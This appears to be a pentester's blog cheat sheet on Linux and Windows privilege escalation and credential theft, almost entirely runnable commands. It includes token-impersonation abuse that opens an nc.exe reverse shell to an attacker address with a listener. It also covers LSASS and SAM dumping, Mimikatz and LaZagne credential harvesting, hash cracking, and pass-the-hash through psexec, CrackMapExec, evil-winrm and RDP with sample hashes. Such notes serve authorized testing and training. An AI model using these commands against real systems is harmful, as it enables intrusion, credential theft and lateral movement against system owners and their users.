Home Pentesting - Privilege Escalation
Post
Cancel

Pentesting - Privilege Escalation

Posted Jul 29, 2023
By Ioritz Urrestarazu Simón & Elisa Alises Núñez
5 min read

Interesting commands

Displays the user and group identity associated with the current user, providing information such as user ID (UID), group ID (GID), and supplementary group memberships:

1

id

Displays a list of previously executed commands in the terminal session:

1

history

Allows a user with administrative privileges to switch to the root user, effectively gaining superuser (root) access:

1

sudo su

To check execution permissions as sudo:

1

sudo -l

To find SUID:

1

find . -perm /4000

other way:

1

find / -perm -u=s -type f 2>/dev/null

Find writteable files:

1

find / -writable -type d 2>/dev/null

Applications which have active connections:

1

netstat -tulpn

Services running as root:

1

ps aux | grep root

Kernel version running

1

uname -a

Interesting Tools

GTFObins

This page contains a list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems:

GTFOBins is a community-driven project that provides a curated list of Unix/Linux commands and binaries that can be used for privilege escalation, bypassing security restrictions, or performing other useful operations. Before using any information from GTFOBins, it is essential to check for the specific user’s GUIDS to ensure the command is applicable and safe in the given context.

PEAS (Windows and Linux) - LinPEAS and WinPEAS

  • https://github.com/carlospolop/PEASS-ng

Metasploit - Exploit suggester

1

msf> use post/multi/recon/local_exploit_suggester

Migrate to process with root privileges (in Meterpreter session):

1

meterpreter > steal_token <ID-process>

Dumping hashes in Meterpreter session:

1

msf > load kiwi

1

meterpreter > hashdump

1

meterpreter > lsa_dump_sam

1

meterpreter > lsa_dump_secrets

Bash privilege escalation

1

sudo -u#-1 /bin/bash

Windows

Windows enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

net config Workstation

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
   
hostname
   
net users

ipconfig /all
   
route print

systeminfo
  
arp -A
  
netstat -ano
   
netsh firewall show state
   
netsh firewall show config
   
schtasks /query /fo LIST /v
   
tasklist /SVC
   
net start
 
DRIVERQUERY
   
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
   
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
   
dir /s _pass_ == _cred_ == _vnc_ == _.config_
   
findstr /si password *.xml *.ini *.txt
   
reg query HKLM /f password /t REG_SZ /s
   
reg query HKCU /f password /t REG_SZ /s

In windows the ‘type’ command is used instead of ‘cat’ to view the contents of a file.

Logged-In Users

1

query user

Currrent user

1

echo %USERNAME%

Current User Privileges

1

whoami /priv

Current User Group Information

1

whoami /groups

Get All Users

1

net user

Get All Groups

1

net localgroup

Get Password Policy & Other Account Information

1

net accounts

Check Process/Application Is Using a Particular Port on Windows

1

netstat -aon | findstr <port>

See the PID of the service and later search it executing “tasklist /svc”.

Windows privesc

OSCP-notes

Hacktricks

MSF - Dumping Hashes (NTLM password hash)

1

meterpreter > lsa_dump_sam

Interesting tools

  • PsExec
  • Mimikatz

Privilege escalation - SeImpersonate

  • With JuicyPotato:

First, authenticate with a user in MSSQL:

1

mssqlclient.py <user>@<IP> -windows-auth

Enabling xp_cmdshell:

1

enable_xp_cmdshell

Confirm that it works:

1

xp_cmdshell whoami /priv

Escalating Privileges Using JuicyPotato, example:

1

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

In attacker’s machine:

1

sudo nc -lnvp 8443
  • With PrintSpoofer:

Example:

1

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

In attacker’s machine:

1

sudo nc -lnvp 8443

Privilege escalation - SeDebugPrivilege

Example:

1

procdump.exe -accepteula -ma lsass.exe lsass.dmp

This is successful, and we can load this in Mimikatz using the sekurlsa::minidump command. After issuing the sekurlsa::logonPasswords commands, we gain the NTLM hash of the local administrator account logged on locally. We can use this to perform a pass-the-hash attack to move laterally if the same local administrator password is used on one or multiple additional systems (common in large organizations).

Credential Hunting in Windows

The tool Lazagne is used for discover credentials that web browsers or other installed applications may insecurely store.

1

start lazagne.exe all

Find patterns with findstr

Example:

1

C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Attacking SAM and LSASS

  • Using reg.exe to Copy Registry:
1
2
3
4
5

reg.exe save hklm\sam C:\sam.save

reg.exe save hklm\system C:\system.save

reg.exe save hklm\security C:\security.save

Then, these files must be transferred to the attacker’s system.

  • Dumping Hashes with Impacket’s secretsdump.py Example:
1

python3 /<path>/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Then, the NTLM hashes must be cracked, with John or Hashcat.

1

sudo hashcat -m 1000 <fileHash> <pathWordlist>

or:

1

john hash --format=NT --wordlist=<pathWordlist>
  • Dumping LSA Secrets Remotely
1

crackmapexec smb <victim-IP> --local-auth -u <user> -p <password> --lsa
  • Dumping SAM Remotely
1

crackmapexec smb <victim-IP> --local-auth -u <user> -p <password> --sam
  • Obtain LSA from Task Manager

Run Task Manager > search Local Security Authority Process > press right mouse button > create dump file, and then it can be analyze with tools, for example mimikatz or similar.

Tools for Analysis Windows Files

MSG and EML files

Free Online .MSG and .EML Viewer

EVTX file

Download: https://github.com/omerbenamram/evtx

1

sudo apt install cargo

1

cargo install evtx

Convert the evtx file in json file:

1

/root/.cargo/bin/evtx_dump -f <output> -o json <file.evtx>

Pass The Hash (PtH)

Interesting Tools

Mimikatz

Obtaining Hashes:

1
2
3

mimikatz # privilege::debug 
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords

Obtaining SAM:

1
2
3

privilege::debug  
token::elevate  
lsadump::sam

Pass the hash:

1
2
3

mimikatz # privilege::debug 
mimikatz # token::elevate
mimikatz # sekurlsa::pth /user:<username> /ntlm:<hash>

Dump Memory

Interesting Tools

LaZagne

1

lazagne.exe all

Download: https://github.com/AlessandroZ/LaZagne/releases

Linux

Pass The Hash (PtH)

Interesting Tools

Impacket PsExec

Syntax:

1

impacket-psexec <username>@<IP> -hashes :<hash>

Example:

1

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

CrackMapExec

Syntax:

1

crackmapexec <protocol> <IP> -u <username> -d <domain> -H <hash>

Example:

1

crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

Evil-winrm

Syntax:

1

evil-winrm -i <IP> -u <username> -H <hash>

Example:

1

evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

RDP

Add the registry:

1

c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Syntax:

1

xfreerdp  /v:<IP> /u:<username> /pth:<hash>

Example:

1

xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

Dump Memory

Interesting Tools

LaZagne

1

python2.7 laZagne.py all
Notes, Pentesting, Privilege Escalation
GTFObins PEAS Metasploit Dumping Hashes MSG EML Mimikatz Pass The Hash SAM
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents